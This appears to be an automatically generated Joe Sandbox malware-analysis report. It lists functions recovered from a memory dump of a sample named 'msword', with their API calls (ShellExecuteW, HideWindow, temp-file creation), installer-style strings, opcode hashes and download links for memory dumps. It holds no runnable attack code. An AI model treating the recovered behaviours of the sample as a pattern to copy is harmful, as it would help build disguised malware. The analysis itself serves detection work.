Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1220653561
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

